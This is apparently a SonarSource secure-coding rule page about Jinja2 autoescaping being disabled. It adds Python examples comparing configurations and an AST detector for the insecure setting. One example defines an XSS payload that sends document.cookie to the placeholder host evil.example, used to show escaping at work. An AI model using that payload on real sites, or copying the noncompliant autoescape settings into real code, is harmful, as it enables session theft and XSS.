
org.sonar.l10n.py.rules.python.S5439.html


This rule is deprecated; use {rule:python:S5247} instead.

Why is this an issue?

Template engines provide an HTML autoescape mechanism that protects web applications against the most common cross-site scripting (XSS) vulnerabilities.

When it is enabled, it replaces the HTML special characters (<, >, &, and quotes) in every template variable with their entity equivalents. This secure-by-design configuration should not be globally disabled. Note that not every engine enables it by default: a Jinja2 Environment created without the autoescape argument has it switched off.

Escaping template variables prevents attacker-controlled data from breaking out of its text context into an execution context such as a <script> element. Disabling autoescaping forces developers to manually escape every template variable for the application to be safe, and a single forgotten variable is enough to reintroduce XSS. The more pragmatic approach is to escape by default and to disable escaping explicitly, per variable, only for HTML fragments the application itself produced.
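The three configurations side by side, as an added example that is not part of the rule description: a Jinja2 Environment left at its default, one with autoescape enabled globally, one with a deliberate per-variable opt-out, and one that decides per template extension. The payload, the evil.example host, and the helper functions are constructed for this example and are not taken from the page.

```python
from jinja2 import DictLoader, Environment, select_autoescape
from markupsafe import Markup

# Constructed attacker-controlled input, e.g. a display name taken from a signup form.
# The evil.example host is a placeholder.
PAYLOAD = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

GREETING = "<p>Hello, {{ name }}!</p>"


def render_default(name):
    """Environment() leaves autoescape off, so the payload is emitted verbatim (Noncompliant)."""
    env = Environment()
    return env.from_string(GREETING).render(name=name)


def render_autoescaped(name):
    """Environment(autoescape=True) replaces <, >, &, " and ' with entities (Compliant)."""
    env = Environment(autoescape=True)
    return env.from_string(GREETING).render(name=name)


def render_with_local_optout(name, trusted_html):
    """Keep the global default on and opt out only for a value the application built itself.

    Two equivalent ways: wrap the value in Markup() before passing it in, or apply the
    |safe filter in the template. Either way the decision is explicit and reviewable
    at one site instead of being the implicit default everywhere."""
    env = Environment(autoescape=True)
    tmpl = env.from_string(
        "<p>{{ name }}</p><div>{{ banner }}</div><div>{{ footer | safe }}</div>"
    )
    return tmpl.render(name=name, banner=Markup(trusted_html), footer=trusted_html)


def make_env_by_extension():
    """select_autoescape() enables escaping for HTML/XML templates and leaves plain-text
    templates (for instance an e-mail body) alone. Templates are held in a DictLoader
    so the example runs offline; the two template names are constructed."""
    templates = {
        "page.html": "<p>{{ name }}</p>",
        "mail.txt": "Hello {{ name }}",
    }
    return Environment(
        loader=DictLoader(templates),
        autoescape=select_autoescape(
            enabled_extensions=("html", "htm", "xml"),
            default_for_string=True,  # env.from_string(...) templates are escaped too
            default=False,            # anything else, e.g. .txt, is not
        ),
    )


if __name__ == "__main__":
    print(render_default(PAYLOAD))        # script tag survives
    print(render_autoescaped(PAYLOAD))    # &lt;script&gt;...
    print(render_with_local_optout(PAYLOAD, "<b>Sale</b>"))
    env = make_env_by_extension()
    print(env.get_template("page.html").render(name="<i>x</i>"))
    print(env.get_template("mail.txt").render(name="<i>x</i>"))
```

Running it shows the default Environment emitting the script tag unchanged, while the autoescaped one emits `&lt;script&gt;`; the opt-out variant still escapes the name and only passes the application's own `<b>Sale</b>` fragment through. The extension-based form is the one the Jinja2 documentation itself recommends as the starting configuration.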

An attacker who successfully exploits a cross-site scripting vulnerability can execute malicious JavaScript in a victim's web browser. The most severe XSS attacks involve:

  • Forced redirection to an attacker-controlled site
  • Modification of the page's content or presentation
  • Account takeover after disclosure of sensitive information such as session cookies or passwords

This rule supports the following libraries:

  • Jinja2

Noncompliant code example

from jinja2 import Environment

env = Environment()  # Noncompliant; a new Jinja2 Environment has autoescape set to False
env = Environment(autoescape=False)  # Noncompliant; escaping disabled explicitly for every template

Compliant solution

from jinja2 import Environment

env = Environment(autoescape=True)  # Compliant; every variable is HTML-escaped unless explicitly marked safe
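The check itself, as an added example and not the rule implementation from SonarSource: a small AST-based detector in the spirit of this rule that flags `Environment(...)` calls with no `autoescape` argument or with a literal `autoescape=False`, and leaves calls that pass `True` or a callable such as `select_autoescape(...)` alone. The sample module it scans is constructed for the example; a call that forwards `**kwargs` is skipped as unknown rather than guessed at.

```python
import ast

# Constructed sample module to scan; line numbers are asserted below.
SAMPLE = """\
from jinja2 import Environment, select_autoescape
import jinja2

env1 = Environment()
env2 = Environment(autoescape=False)
env3 = jinja2.Environment(autoescape=True)
env4 = Environment(autoescape=select_autoescape(["html"]))
"""


def _is_environment_call(node):
    """Match both `Environment(...)` and `jinja2.Environment(...)` spellings."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id == "Environment"
    if isinstance(func, ast.Attribute):
        return func.attr == "Environment"
    return False


def find_unescaped_environments(source):
    """Return (line, reason) for each Environment(...) call that leaves autoescape off.

    Only a literal False is reported as an explicit disable; anything else that is
    not a literal (a variable, a select_autoescape() call) is left to review."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and _is_environment_call(node)):
            continue
        if any(k.arg is None for k in node.keywords):
            continue  # **kwargs: cannot tell statically, do not report
        kw = next((k for k in node.keywords if k.arg == "autoescape"), None)
        if kw is None:
            findings.append((node.lineno, "autoescape not set; Jinja2 defaults to False"))
        elif isinstance(kw.value, ast.Constant) and kw.value.value is False:
            findings.append((node.lineno, "autoescape=False disables escaping globally"))
    return findings


if __name__ == "__main__":
    for line, reason in find_unescaped_environments(SAMPLE):
        print(f"line {line}: {reason}")
```

Pointing it at a real tree (`ast.parse(open(path).read())` per file) gives the same two classes of finding as the rule: the implicit default and the explicit `False`.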

© 2015 - 2024 Weber Informatics LLC